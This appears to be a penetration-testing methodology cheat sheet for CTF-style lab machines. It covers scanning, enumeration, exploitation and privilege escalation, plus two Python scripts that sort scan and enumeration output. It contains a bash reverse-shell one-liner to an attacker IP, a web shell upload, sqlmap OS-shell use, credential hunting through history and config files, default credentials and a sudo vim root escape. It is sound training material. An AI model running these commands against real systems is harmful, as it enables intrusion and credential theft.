Standard attack methodology:
1. Network scan - nmap all ports, service detection, OS detection
2. Service enumeration - probe every open port, grab banners, versions
3. Web enumeration (if applicable) - directory brute force, parameter fuzzing, tech stack identification
4. Vulnerability identification - searchsploit for versions, CVE databases, misconfigurations
5. Exploitation - get initial foothold
6. Post-exploitation - lateral movement, privilege escalation, data exfiltration
NETWORK SCAN:
```bash
# Quick initial scan
nmap -sC -sV -oA initial 10.10.11.123
# Full port scan
nmap -p- --min-rate 5000 -oA full 10.10.11.123
# Targeted service scan on found ports
nmap -sC -sV -p 22,80,443,3306,8080 -oA targeted 10.10.11.123
```
Promising:
- Uncommon ports (8080, 8443, 3000, 5000, etc.) - custom apps, likely vulnerable
- Database ports exposed (3306 MySQL, 5432 Postgres, 27017 MongoDB) - direct access attempt
- Admin interfaces (5985 WinRM, 5900 VNC, 3389 RDP)
- SMB (139/445) on Windows - credential spraying, share enumeration
Noise:
- Just port 22/SSH on Linux with a recent version - usually not the entry point
- Port 80/443 showing the default nginx/apache page - needs deeper web enum
- Filtered ports - scanning them further is a waste of time
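To make the promising/noise split above mechanical, here is an added example (not part of the original notes) that parses one `Host:` line of the `.gnmap` file that `nmap -oA` writes and buckets each port using exactly the rules of thumb listed; the port-to-class mapping and the sample scan line are constructed.

```python
import re

# Port classes from the Promising/Noise lists above (constructed mapping, not an nmap feature).
UNCOMMON_APP_PORTS = {8080, 8443, 3000, 5000}
DATABASE_PORTS = {3306: "MySQL", 5432: "Postgres", 27017: "MongoDB"}
ADMIN_PORTS = {5985: "WinRM", 5900: "VNC", 3389: "RDP"}
SMB_PORTS = {139, 445}

# One port entry in .gnmap looks like: port/state/proto/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/(open|filtered|closed)/(\w+)//([^/]*)//([^/]*)/")


def parse_gnmap_line(line):
    """Return (host, [(port, state, service, version), ...]) for one 'Host:' line."""
    host = re.search(r"Host:\s+(\S+)", line).group(1)
    ports = [(int(p), st, svc, ver.strip()) for p, st, _proto, svc, ver in PORT_RE.findall(line)]
    return host, ports


def triage(ports):
    """Split parsed ports into (promising, noise) lists of findings, per the notes above."""
    promising, noise = [], []
    for port, state, service, version in ports:
        if state != "open":
            noise.append(f"{port}/{service}: {state}, scanning it further is a waste of time")
        elif port in DATABASE_PORTS:
            promising.append(f"{port}: {DATABASE_PORTS[port]} exposed, try direct access")
        elif port in ADMIN_PORTS:
            promising.append(f"{port}: {ADMIN_PORTS[port]} admin interface exposed")
        elif port in SMB_PORTS:
            promising.append(f"{port}: SMB exposed, enumerate shares")
        elif port in UNCOMMON_APP_PORTS:
            promising.append(f"{port}: uncommon port, likely a custom app ({version or 'no banner'})")
        elif port == 22:
            noise.append(f"22/ssh: {version or 'unknown version'}, usually not the entry point")
        elif port in (80, 443):
            noise.append(f"{port}/{service}: needs deeper web enum before judging")
        else:
            promising.append(f"{port}/{service}: non-standard, look closer ({version or 'no banner'})")
    return promising, noise


# Constructed sample: one host line in nmap grepable format.
SAMPLE = ("Host: 10.10.11.123 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.2p1/, "
          "80/open/tcp//http//nginx 1.18.0/, 3306/open/tcp//mysql//MySQL 5.7/, "
          "8080/open/tcp//http-proxy///, 445/filtered/tcp//microsoft-ds///")

if __name__ == "__main__":
    host, found = parse_gnmap_line(SAMPLE)
    hot, cold = triage(found)
    print(host, "PROMISING:", *hot, "NOISE:", *cold, sep="\n")
```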
SERVICE ENUMERATION:
```bash
# SMB
smbclient -L //10.10.11.123 -N
smbmap -H 10.10.11.123
enum4linux -a 10.10.11.123
# FTP
ftp 10.10.11.123
# try anonymous:anonymous
# SMTP - the VRFY lines are typed inside the nc session
nc 10.10.11.123 25
VRFY root
VRFY admin
# SNMP
snmpwalk -v2c -c public 10.10.11.123
# RPC - enumdomusers is typed at the rpcclient prompt
rpcclient -U "" 10.10.11.123
enumdomusers
```
Promising:
- Anonymous FTP with write permissions - upload webshell
- SMB shares with readable/writable access - credentials, configuration files
- SNMP community string "public" works - extract user lists, running processes
- Banner reports a specific version with a known CVE
Noise:
- Service responds but no anonymous access and no version info
- SMB IPC$ share only (standard, no data)
- Generic banners (SSH-2.0-OpenSSH_8.2p1)
Web Enumeration
```bash
# Directory brute force
gobuster dir -u http://10.10.11.123 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
# Subdomain enumeration
gobuster vhost -u http://example.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
# Tech identification
whatweb http://10.10.11.123
curl -I http://10.10.11.123
# Parameter fuzzing (if you found /admin or /api)
ffuf -u http://10.10.11.123/admin/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
```
Promising:
- /admin, /manager, /phpmyadmin - login panels to brute force or exploit
- /uploads, /files, /backup - accessible files, potential upload
- Old PHP version in headers - likely exploitable
- Custom app (Node.js, Flask, Ruby) - higher chance of vulns than WordPress
- Error messages revealing paths/versions
Noise:
- Standard /css, /js, /images directories
- /robots.txt with nothing interesting
- Default CMS pages with no apparent vuln
Vulnerability Identification
```bash
# Search exploits for specific versions
searchsploit apache 2.4.49
searchsploit -m 50383   # download exploit
# CVE lookup (web search)
#   google "jenkins 2.289 exploit"
#   google "tomcat manager default credentials"
# Check for default creds
#   creds.txt or /usr/share/seclists/Passwords/Default-Credentials/*
```
Misconfigurations:
- Tomcat manager with tomcat:s3cret
- Jenkins without auth
- phpMyAdmin with root and an empty password (root:)
Promising:
- Exact version match with RCE exploit in exploit-db
- Service running as root/admin (from nmap or banner)
- Default credentials work (admin:admin on Tomcat manager)
- File upload with no filtering
- Known CVE with public PoC code
Noise:
- Vulnerabilities requiring local access when you're remote
- DoS exploits (you need RCE/shell)
- Theoretical vulns with no public exploit
- Patched versions that claim to be old (version spoofing)
Exploitation
```bash
# Web shell upload
curl -F "file=@shell.php" http://10.10.11.123/upload.php
# SQLi to RCE (if mysql)
sqlmap -u "http://10.10.11.123/page.php?id=1" --os-shell
# Exploit public CVE
python3 exploit.py 10.10.11.123 10.10.14.15 4444
# Reverse shell one-liner (after finding RCE)
bash -c 'bash -i >& /dev/tcp/10.10.14.15/4444 0>&1'
# Listener
nc -lvnp 4444
```
Promising:
- Shell connects back immediately - you have execution
- Web shell responds - RCE confirmed
- SQL injection dumps database - credentials found
- File inclusion loads /etc/passwd - LFI confirmed, can chain to RCE
Noise:
- Exploit runs but no callback - firewall blocking, wrong target, patched
- SQL injection gets blocked by WAF
- Upload works but file gets deleted/filtered
Post-Exploitation
```bash
# Situational awareness
whoami
id
hostname
uname -a
ip a
# Find privilege escalation vectors
sudo -l
find / -perm -4000 2>/dev/null   # SUID binaries
getcap -r / 2>/dev/null          # capabilities
cat /etc/crontab                 # scheduled tasks
# Credentials hunting
cat /home/*/.bash_history
grep -r "password" /var/www/html
cat /var/www/html/config.php
find / -name "*.db" 2>/dev/null
# Lateral movement (if multiple users)
ssh user2@localhost -i /home/user1/.ssh/id_rsa
# Privilege escalation
# If sudo -l shows (ALL) NOPASSWD: /usr/bin/vim
sudo vim -c ':!/bin/bash'
```
Promising:
- sudo -l shows NOPASSWD entry - instant root path
- SUID binary you can exploit (find, vim, etc.) - GTFOBins it
- Readable /etc/shadow - crack hashes offline
- DB config with root password - credential reuse
- SSH key for another user - lateral movement
- Cron job running as root with writable script - script modification
Noise:
- SUID on standard binaries (/bin/ping, /usr/bin/passwd) - expected, not exploitable
- bash_history is empty - HISTFILE disabled
- No sudo rights at all
- Other users but can't read their directories
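The same signal-versus-noise filter applied to this section's enumeration output, as an added example that is not part of the original notes: it takes constructed samples of what `sudo -l`, `find / -perm -4000` and `cat /etc/crontab` print and keeps only the misconfigurations the Promising list flags, dropping the expected SUID baseline the Noise list mentions; the baseline set and the writable-path set are constructed assumptions.

```python
import re

# Setuid binaries expected on a stock Linux install: the noise from the list above (constructed baseline).
EXPECTED_SUID = {"ping", "passwd", "su", "sudo", "mount", "umount", "chsh", "chfn",
                 "newgrp", "gpasswd", "fusermount", "pkexec"}


def audit_sudo(sudo_l_output):
    """NOPASSWD entries are the instant root path; password-protected entries are not."""
    return [line.strip() for line in sudo_l_output.splitlines() if "NOPASSWD" in line]


def audit_suid(find_output):
    """SUID binaries that are NOT in the expected baseline (e.g. find, vim, custom tools)."""
    return [p for p in find_output.split() if p.rsplit("/", 1)[-1] not in EXPECTED_SUID]


def audit_crontab(crontab_text, writable_paths):
    """Root cron jobs whose script path is in writable_paths (the set you build from ls -l)."""
    hits = []
    for line in crontab_text.splitlines():
        m = re.match(r"\s*(?:\S+\s+){5}root\s+(\S+)", line)  # 5 time fields, user, command
        if m and m.group(1) in writable_paths:
            hits.append(line.strip())
    return hits


# Constructed samples of what the enumeration commands above print.
SUDO_L = """Matching Defaults entries for user1 on box:
    env_reset, mail_badpass
User user1 may run the following commands on box:
    (ALL) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/systemctl restart nginx"""
SUID_FIND = "/usr/bin/passwd\n/usr/bin/sudo\n/bin/ping\n/usr/bin/find\n/usr/local/bin/backup"
CRONTAB = """SHELL=/bin/sh
# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    /opt/scripts/cleanup.sh"""
WRITABLE = {"/opt/scripts/cleanup.sh"}  # constructed: paths that ls -l showed as writable by us

if __name__ == "__main__":
    print("sudo NOPASSWD:", audit_sudo(SUDO_L))
    print("non-baseline SUID:", audit_suid(SUID_FIND))
    print("writable root cron scripts:", audit_crontab(CRONTAB, WRITABLE))
```

Run against a host you administer, every line it prints is a misconfiguration to fix before someone else finds it.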
Key intuition builder: Most boxes have 1-2 actual exploit paths and 10+ rabbit holes. The signal is anything non-standard, outdated, or misconfigured. The noise is default, expected, secured.